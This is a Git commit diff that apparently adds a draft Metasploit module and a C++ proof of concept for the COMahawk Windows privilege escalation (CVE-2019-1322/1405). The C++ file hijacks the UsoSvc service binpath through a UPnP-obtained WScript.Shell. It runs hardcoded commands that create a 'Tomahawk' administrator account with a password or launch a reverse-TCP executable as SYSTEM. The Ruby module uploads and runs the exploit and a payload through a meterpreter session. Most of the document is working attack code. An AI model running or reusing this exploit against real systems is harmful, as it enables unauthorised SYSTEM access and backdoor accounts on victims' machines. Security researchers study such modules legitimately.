First draft of windows comahawk priv esc

2019-12-09 19:07:26 -06:00 · 2019-12-09 19:07:26 -06:00 · 8a9dd35793
parent 104710ca41
commit 8a9dd35793
7 changed files with 584 additions and 0 deletions
--- a/data/exploits/cve-2019-1322/CVE-2019-1322-EXE.exe
+++ b/data/exploits/cve-2019-1322/CVE-2019-1322-EXE.exe
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.sln
@ -0,0 +1,22 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 2013
+VisualStudioVersion = 12.0.21005.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-1322-EXE", "CVE-2019-1322-EXE.vcxproj", "{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.ActiveCfg = Debug|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Debug|Win32.Build.0 = Debug|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.ActiveCfg = Release|x64
+		{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}.Release|Win32.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj
@ -0,0 +1,149 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20191322EXE</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/CVE-2019-1322-EXE.vcxproj.filters
@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/cve-2019-1322.cpp
@ -0,0 +1,108 @@
+#include <iostream>     #REMOVE BEFORE RELEASE
+#include <atlbase.h>    // CComPtr
+#include <Propvarutil.h>
+#include <string>
+#import "wshom.ocx" no_namespace, raw_interfaces_only  // Error here is a bug. It will still compile
+
+# define command_size 50
+const GUID guidObject = { 0x6d8ff8e7, 0x730d, 0x11d4, { 0xbf, 0x42, 0x00, 0xb0, 0xd0, 0x11, 0x8b, 0x56 } };
+
+struct __declspec(uuid("6d8ff8d4-730d-11d4-bf42-00b0d0118b56"))
+IUPnPContainerManager : public IUnknown {
+virtual HRESULT __stdcall ReferenceContainer(wchar_t*) = 0;
+virtual HRESULT __stdcall UnReferenceContainer(wchar_t*) = 0;
+virtual HRESULT __stdcall CreateInstance(
+	wchar_t* string1,
+	GUID* guid1,
+	GUID* guid2,
+	IUnknown** pObject) = 0;
+virtual HRESULT __stdcall CreateInstanceWithProgID(
+	wchar_t* string1,
+	wchar_t* guid1,
+	GUID* guid2,
+	IUnknown** pObject) = 0;
+virtual HRESULT __stdcall Shutdown() = 0;
+
+};
+
+int wmain(int argc, wchar_t* argv[], wchar_t* envp[])
+{
+	wchar_t command[command_size];
+
+	wprintf(L"This is a test\n");
+	wprintf(L"This is a test %s\n", argv[1]);
+	CoInitialize(NULL);
+
+	HRESULT hr1, hr2 = 0, hr3 = 0, hr4 = 0;
+
+	IUPnPContainerManager* ContainerMgr;
+
+	hr1 = CoCreateInstance(guidObject, nullptr, CLSCTX_ALL, IID_PPV_ARGS(&ContainerMgr));
+
+	hr2 = ContainerMgr->ReferenceContainer((wchar_t*)L"apt69");
+
+	CLSID clsid;
+
+	CLSIDFromProgID(OLESTR("WScript.Shell"), &clsid);
+
+	IWshShell* WshInterface = nullptr;
+
+	auto ShellUUID = __uuidof(IWshShell);
+
+	hr3 = ContainerMgr->CreateInstance((wchar_t*)L"apt69", &clsid, &ShellUUID, (IUnknown**)&WshInterface);
+
+	int out;
+	VARIANT s;
+	InitVariantFromInt32(1, &s);
+	VARIANT type;
+	InitVariantFromBoolean(TRUE, &type);
+
+	if (argc > 1)
+	{
+		const wchar_t* msg[6] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c ", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+
+//		const wchar_t* command = (std::wstring(msg[1]) + std::wstring(argv[1]) + std::wstring(L" &\"")).data();
+		memset((void*) command, 0, command_size * sizeof(wchar_t));
+		wsprintf(command, L"%s%s &\"", msg[1], argv[1]);
+
+		wprintf(L"command = %s\n", command);
+
+		printf("[\\] Progress: ");
+		for (int i = 0; i < 6; i++)
+		{
+			if (i == 1)
+			{
+				wprintf(command);
+				hr4 = WshInterface->Run(::SysAllocString(command), &s, &type, &out);
+			}
+			else
+			{
+				hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
+				wprintf(msg[i]);
+			}
+			Sleep(3000);
+			printf(" %d/6", i + 1);
+		}
+
+		printf("\n[+] Command executed.");
+	}
+	else
+	{
+		//const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net user /add Tomahawk RibSt3ak69 &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+		const wchar_t* msg[9] = { L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\Users\\msfuser\\Desktop\\revtcpx64.exe &\"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"cmd.exe /c net localgroup administrators /add Tomahawk & \"", L"sc start UsoSvc", L"sc stop UsoSvc", L"sc config UsoSvc binpath= \"C:\\WINDOWS\\system32\\svchost.exe - k netsvcs - p\"", L"sc start UsoSvc" };
+
+		printf("[\\] Progress: ");
+		for (int i = 0; i < 9; i++)
+		{
+			hr4 = WshInterface->Run(::SysAllocString(msg[i]), &s, &type, &out);
+			Sleep(3000);
+			printf(" %d/9", i + 1);
+		}
+
+		printf("\n[+] Hopefully Tomahawk:RibSt3ak69 is added as an admin.\n");
+	}
+
+	CoUninitialize();
+
+	return 0;
+}
--- a/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
+++ b/external/source/exploits/CVE-2019-1322/CVE-2019-1322-EXE/~AutoRecover.CVE-2019-1322-EXE.vcxproj
@ -0,0 +1,84 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{0AF64CAC-6E3D-424F-87F3-2F21D1618EEF}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20191322EXE</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+    </ClCompile>
+    <Link>
+      <SubSystem>Console</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="cve-2019-1322.cpp" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
--- a/modules/exploits/windows/local/comahawk.rb
+++ b/modules/exploits/windows/local/comahawk.rb
@ -0,0 +1,199 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/registry'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::ReflectiveDLLInjection
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
+      'Description'    => %q(
+      THis exploit uses two ulnerabilities to execute a command as an elevated user.
+      The first uses the UPnP service to execute as a LOCAL SERVICE user and the
+      second abuses a misconficuration to allow execution of LOCAL SERVICE accounts
+      to run as system.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'NCC Group',            # Original discovery (https://www.nccgroup.trust/uk/)
+          'hoangprod',            # PoC
+          'bwatters-r7'           # msf module
+        ],
+      'Platform'       => ['win'],
+      'SessionTypes'   => ['meterpreter'],
+      'Targets'        =>
+        [
+          ['Windows x64', { 'Arch' => ARCH_X64 }]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 12 2019',
+      'References'     =>
+        [
+          ['CVE', '2019-1322'],
+          ['CVE', '2019-1405'],
+          ['EDB', '47684'],
+          ['URL', 'https://github.com/apt69/COMahawk'],
+          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
+          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => 'False'
+        }
+    ))
+
+    register_options([
+      OptString.new('EXPLOIT_NAME',
+        [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
+      OptString.new('PAYLOAD_NAME',
+        [false, 'The filename for the payload to be used on the target host if (%RAND%.exe by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write binaries if (%TEMP% by default).', nil]),
+      OptInt.new('EXECUTE_DELAY',
+        [false, 'The number of seconds to delay before executing the exploit', 3])
+    ])
+  end
+
+  def setup
+    super
+    @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
+    @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i)
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_path = "#{temp_path}\\#{payload_name}"
+    @exploit_path = "#{temp_path}\\#{exploit_name}"
+    @payload_exe = generate_payload_exe
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
+    #
+    # This needs to be better
+    #
+    if sysinfo['Architecture'] == ARCH_X86
+      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
+    end
+    if sysinfo['OS'] =~ /XP/
+      fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
+    end
+  end
+
+  def ensure_clean_destination(path)
+    if file?(path)
+      print_status("#{path} already exists on the target. Deleting...")
+      begin
+        file_rm(path)
+        print_status("Deleted #{path}")
+      rescue Rex::Post::Meterpreter::RequestError => e
+        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        print_error("Unable to delete #{path}")
+      end
+    end
+  end
+
+  def ensure_clean_exploit_destination
+    ensure_clean_destination(exploit_path)
+  end
+
+  def ensure_clean_payload_destination
+    ensure_clean_destination(payload_path)
+  end
+
+  def upload_exploit
+    local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2019-1322', 'CVE-2019-1322-EXE.exe')
+    upload_file(exploit_path, local_exploit_path)
+    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
+  end
+
+  def upload_payload
+    write_file(payload_path, payload_exe)
+    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
+  end
+
+  def execute_exploit
+    sleep(datastore['EXECUTE_DELAY'])
+    print_status("Running exploit #{exploit_path} with payload #{payload_path}")
+    begin
+      output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}")
+    rescue Rex::TimeoutError => e
+      vprint_status("This is normal.... needs to be fixed....")
+    end
+  end
+
+  def exploit_dll
+    begin
+      print_status('Checking target...')
+      validate_active_host
+      validate_target
+      print_status('Target Looks Good... trying to start notepad')
+      process = setup_process
+      inject_magic(process)
+      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error(e.message)
+    end
+  end
+
+  def exploit_exe
+    begin
+      validate_remote_path(temp_path)
+      ensure_clean_exploit_destination
+      ensure_clean_payload_destination
+      upload_exploit
+      upload_payload
+      execute_exploit
+      print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      print_error(e.message)
+      ensure_clean_exploit_destination
+      ensure_clean_payload_destination
+    end
+  end
+
+  def exploit
+    begin
+      validate_active_host
+      validate_target
+      exploit_exe
+    end
+  end
+
+  attr_reader :exploit_name
+  attr_reader :payload_name
+  attr_reader :payload_exe
+  attr_reader :temp_path
+  attr_reader :payload_path
+  attr_reader :exploit_path
+end